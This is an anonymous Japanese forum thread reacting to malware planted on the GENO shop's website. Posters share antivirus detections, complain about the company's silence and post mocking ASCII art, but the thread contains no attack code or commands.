なんか鯖落としちゃダメって契約でもあんの？

>>906
目先の営業利益しか考えてないか、今回のことを軽視しているか
知識0のやつらしかいない。のどれかだな

>>907
というかGENOだと全部当てはまってるだろｗ

そもそもjavascriptいらんよな、こんなシンプルなサイトなら

>>876
ノートン

意外と、単にシャットダウンの仕方がわからないだけだったりして

>>896
ウェブシールドつけてたら感染から遮断してくれるはずなんだが。

誰かマスコミうごかせよ。
総力挙げようぜ

>>907
土日は休みたい
月曜日はやる気が起きない
原因解明とかやりたくない
そもそもそんな知識もない
謝罪とかメンドクサイ
とにかく売上が無くなるのは嫌だ

という事だろう。

ウイルス仕掛けられたのは被害者として同情するがその後の対応が酷すぎる
約二日間放置とか言い訳できないだろう

そろそろ3日になるのか
ν速も3日ルールだっけ？

>>758
AVG,Avast!Aviraに送っといた。

画面回転のホットキーがCtrlだかAlt、Homeボタンで勝手に動作
左キーが連続で効かない。多分ウイルス関係ないが、なんだこれ

>>914
それだと
もうGENOはつぶれるしかないな。

>>916
同一ソースなら・・・つーかそもそもソースすら無いからな
そろそろどこかニュース記事にしても良さそうだけど

>>891
来てたのか。　更新したらGENO行っても平気？

>>918
とりあえず、画面のプロパティ開いて、そこから直せばいいとおもう。

　　　 ,ｨｨr--　 ..__､j
　　 ﾙ! {　　　　　　 ｀ヽ,　　　　　　　∧
　 N { l `　　　　,、　　　i　＿|＼/ ∨　∨
　 ゝヽ　　　_,,ｨjjハ、 　 |　＼
　　`ニr‐tﾐ-rr‐ｔｭ<≧rﾍ　　 >　　　これはGENOが仕掛けた新手のSEOだったんだよ
　　 　 {___,ﾘ ヽ二´ﾉ　 }ｿ　∠　
　　　　'､ `,-_-ｭ　 u /|　　 ∠
　　　 　 ヽ`┴ '　／／l＼　　|／＼∧　 /
--─‐ｧ'|　｀ニ--‐'´　/　 |`ｰ　..__　　 `´
　 　 く__レ1;';';';>､　 /　__ |　 ,=､　___
　　 「　∧ 7;';';'|　ヽ/ _,|‐､|」 |Ｌ..! {L..l　))
　　 |　 |::.V;';';';'|　/.:.|トl｀´.!　l _,,,ｌ | _,,|　 , -,
　 　 !　|:.:.:l;;';';';'|/.:.:.:||=|=; |　| 　 | |　.l /　〃 ))
　　　 l |:.:.:.:l;';';'/.:.:.:.:| ! ヽ　＼!‐=:l/ `:lj　 7
　　　 | |:.:.:.:.l;'/.:.:.:.:.:.! ヽ:::＼::　 ::::|　 ::l　/

>>919
今の時点で潰れるのは確定だろ

警察がうごいてもいい頃合いだな

日曜の深夜にマクドの無料クーポン祭りで短縮ウイルスの存在を知ったが
もし日曜の午前〜夕方にかけて2chやってたら間違いなく引っかかってたと思う。

ttp://up.mugitya.com/img/Lv.1_up90802.png
本社HPもメンテなのにまだあるんだな

>>919
潰れるでしょ、このままじゃ。

これはVistaを買わせたいMicrosoftの壮大な陰謀

GENOは被害者、悪くない

4月5日から7日にかけて当サイトが改竄され、悪意あるスクリプトが掲載されておりました。
当社としては警察など、公的機関への通報等・・・・・
また、その間にアクセスをされたお客様はウイルス対策ソフトの各種スキャンをご利用云々


そのうち絶対こういうことトップに書くんだろうなぁ

avastつかっててよかったカー！！！

オーー！！！！！！！！１

ウンチヴァ捨ててよかったカー！！！

ｵｰｰ！！！！！！！！！！！！！１

>>930
まともなとこなら日曜に出すレベル

あくまで不具合で通すんじゃね？

俺のちんこもたたないんだけどこのウイルスのせいか

なんでGENOのURLないのかわらえるｗ

VPCでGENOに飛んで、メンテ中のページからカートの中身を見て、
ウィルスセキュリティZEROを表示させた後にTemporaryInternetフォルダを
チェックしたらしっかりとウィルスのスクリプトが残ったｗ

テキストにリネームしてVPC用の共有フォルダに保存したんだけど、
テキスト貼ったらまずいかな？

>>930
それ書くなら昨日書いてるだろ
昨日書かなかったってことはこれからも謝罪する気はないんだろｗ

　　　　　　　　　　　　　_,,..r'''""~~`''ｰ-.､
　　　　　　　　　　　 ,,.r,:-‐'''"""~~`ヽ､:;:;:＼
　　　　　　　　　　 r"r　　　　　　　　　 ゝ､:;:ヽ
　　 r‐-､　　 ,...,,　|;;;;|　　　　　　　,,.-‐-:､ ヾ;:;ゝ
　　 :i!　 i!　　|: : i! ヾ| r'"~~` :;:　::;",,-‐‐-　 `r'^!
　　　 !　 i!. 　|　 ;|　l| 　''"~~　　　､　　　　　　i' |
　　 　 i!　ヽ　|　　|　|　　　 ,.:'"　　　､ヽ､　　　!,ﾉ
　　　　ゝ　 `-! 　:|　i!　　.:;:　'~~ｰ~~'"　ﾞヾ　: : ::|
　　 r'"~`ヾ、　　　i!　i!　　 ,,-ｪェI二エﾌﾌ　: : :::ﾉ~|`T　＜イエーイ、GENOの社員見てるー？
　　,.ゝ､　　r'""`ヽ､i!　`:､　　 ー　-　'"　:: : :／ ,/ 　　　　はよ職安いけよーwwwwwww
　　!､　 `ヽ､ー､　　 ヽ‐''"`ヾ､.....,,,,＿,,,,.-‐'",..-'"
　　 | ＼ i:" ）　　　　 |　　　~`'''ー---―''"~
　　　ヽ　`'"　　　　 ノ

C:\Documents and Settings\ユーザ\Local Settings\Temp\　Rnu6d2Pn.zip
とりあえずこんな名前のzipがDropper.efで引っかかった
とにかく感染してたらZIP作るってこと？

avastでも
シールドが「標準」だと感染確認
「高」か、適切に設定した「カスタム」でマルウェア拒否

avastで安心してるやつは気を付けろ

２ちゃんで宣伝なんかしてるから目つけられるんだよ

おまえら短縮ウイルスをzipスレに貼ったりしたのか？
あんなの本物と混ぜられたら防御不可能だろ。鬼過ぎるぞ。

嘘を嘘と〜のコピペ貼れよ

作ったシステム会社のHPにgenoのシステム概要が載ってるな
http://www.it-solution.jp/casestudy/geno/index.html

どこまで情報を抜かれてしまっているのか・・・

>>942
そんなもん引っかかるやつが悪いだろ
zip（笑）

まだGENOにアクセスすると感染するんか？

>>942
お前そればっかりだな

みてらんねーわｗ
GENOの鯖ってどこにあるの？
近所なら手伝ってやるよ

>>945
ひっかかるだろｗ
このスレの存在を知っててもこのスレを開いて読まないと
短縮ウイルスの貼られ方とかわからない。このスレスルー
してたけど日曜の深夜に読んでみてぞっとしたよ。
普段zipスレいたけど日曜の午後にいなくてよかったと心底
ほっとした。

>>946
トップからリンク踏んで中入ってくと感染する

SEOワロタ

誰か今回の内容を、後世に残るような名AAにしてくれ

>>947
さっきのとは違って今回はまじな感想だよ。
過去スレ読んでzipスレに混ぜてるレスとか
読んだけど本当に鬼だなって思ってな。
zipスレなんて混ぜられたら絶対に気付かないもん。

こんなセキュリティ体制ゆるゆるのいい加減なショップで買い物するやつもういないだろ

>>954
ゆるかわセキュリティー
これから流行るな、うん

zipスレなんぞウイルス貼られても大丈夫だろｗ
あいつらどんだけのURLを掻い潜ってきたと思ってるんだ
基本的に仮想使ってるだろｊｋ

小悪魔セキュリティとかもありだな

怖くてgeno見てないんだが、唯のお詫びしか載せてないの？
どんな問題があって何処を改修したのかとか、ユーザはその後どう対処すれば良いか記載するのが運営者の責務だと思うんだけどねえ

　　 　 　 　 ,､　　　　　　　　　 _
　　　　　　/ l　　　　　　　　　 ヽヽ
　　　　　 ,′|　　　　　　　　　　ﾍ ヽ
　　　　　 l　 l　　　　　　　　　　　l ﾍ
　　　　　 |　 l　　　　　　　　　　　l.　l
　　　　　 |　ﾍ　　　 　 　 　 　 　 l　 |
　　　　　 ﾍ 　ヽ　　　　　　　　　/　 j
　　　　　　ヽ　　＼　,　-┬┬､/.　 /
　　　　　　　＼　　 7　　 ヽ ヽ＿∨
　　　　　　　　 ヽ　 l　　 . 　二 --｀ゝ
　　　　　　　 　 /ゝ' _.. '-'´ ･ 　　･ ヽヽ
　　　　　　　　 j−'´ |　 = 　 _人 　~ l　〉　＜セキュリティ〜♪
　　　　　　　　/￣￣l 　　　　　　　　ﾉ´
　　　　 　 　 /￣￣~|　　　 　 _..　ィ‐┐
　　　　　 　 ゝ──'＞ー＜二○'´i￣
　　　　　　　　　　　`ｰ┐　　　　　 l
　　　　　　　　　　　 ＿｣　　　　　　つ
　　　　　　　　　　　ゝ───… ￣
　　　　　　　　　／
　　　　　 ⌒ヽ/

小悪魔age派

┏━━━━━━━━━━━━━━━━
┃　＞サーバーに一部不具合がございました　　
┃　分かったかボケなす
┃　　　　　　　 　　人 　　　
┃　 　　　　　　　 <｡ .>　　　　
┃　　　　∧_∧. 　/Vﾐ　ﾊﾞｼ!!
┗━━（´･∀･`）/ ミ━━━━━━━━━
　　　　/)　y )つ　　　　　
　|~￣]￣￣￣￣￣￣|

>>960
とか言いながらsageんなｗｗｗｗ

なぜ頑なに無言を決め込むんだ

そもそもここは
新品と表記しといて中古で送るようなとこでしょ

再起動かけたけど無問題なおれセーフ？

>>956
仮想でやってるのか。
おまえらまじですごいな

ショップ情報が価格comから消滅したな

>>965
今回のウイルスはステルスタイプだから
むしろ再起動かけたらまずい

>>852が探偵ファイルで取り上げられたな
誰かこっちも調査依頼してこいよ

>>965
いい機会だし諸々のパスワード変更しておいた方がいいな

これって何処の消費者センターに相談すれば良いんだ？
地元の都道府県でおｋ？GENOの本社が有る所が良いのか？？

>>860ｔｈｘ

短縮サイト全部NGするからいちらんくれよ

なんでげのはお詫びもろくにせず平気な顔してんの？リカバリ大変だったんですけど。
ずっとほっといた責任あるんだから賠償しろよ！

>>965
多分セーフじゃないの？
>>802にカスペで検知できるって書いてあったからオンラインスキャンしてみろよ

>>974
GENO「この機会に、少々高めですが弊社のDSP版Vistaをお買い求めください！」

GENOはウイルスもったままWEB販売現在もやってるの？
在庫減っているんだろうか？

>>975
おｋｋｋ
前スレに再起動かからないとか書いてあったよね

廃品回収業者ですよ

xp、ZoneAlarm Antivirus使いで感染した人いる？
タスクマネージャーのプロセスも正常だし、カスペのオンラインスキャンも
share.exeしか検知しなかった。

>>978
マジレスするとバックドア+ボットなんだから再起動とか関係ねえよ

>>944
俺そこに面接に行ったけど
マンションの一室でやってる感じ
セキュリティー対策は甘そうな感じだったな

>>982
そこで働かなかったのか？

>>983
不採用だったｗ

今頃責任の投げ合いやってるんだろうねぇ

>>953
お前そればっかりだな

今日謝罪するか否かでこの会社の命運が分かれるな

>>981
じゃあどうしろってんだよ

>>966
分かったらさっさと踏んで来いよ

>>954
中小の通販サイトなんてこんなところが多いだろうよ。
セキュリティーの知識なんてないし対策もほとんどしていない。

まだだ・・・まだ終わらんぞぉ

次スレよろ

感染したとかしないとか心配ならPC使うな

次スレいるのか

マジで悩んでるやつへ

Avast!を導入、ウェブシールド(localhost:12080)を設定するとこのスレとおさらば。

昨日踏んだけど何ともなかったぞ

1000なら倒産

1000ならウィルス付きPC大特化セール開催

１０００ならみのりん

999

>>984
今考えるとよかったんじゃない？

このスレッドは１０００を超えました。
もう書けないので、新しい職を探して下さい。。。

　　　　　　　　　　　　　　　　　　　　　　　　　　　　ニュース速報
　　　　　　　　　　　　　　http://www.hellowork.go.jp/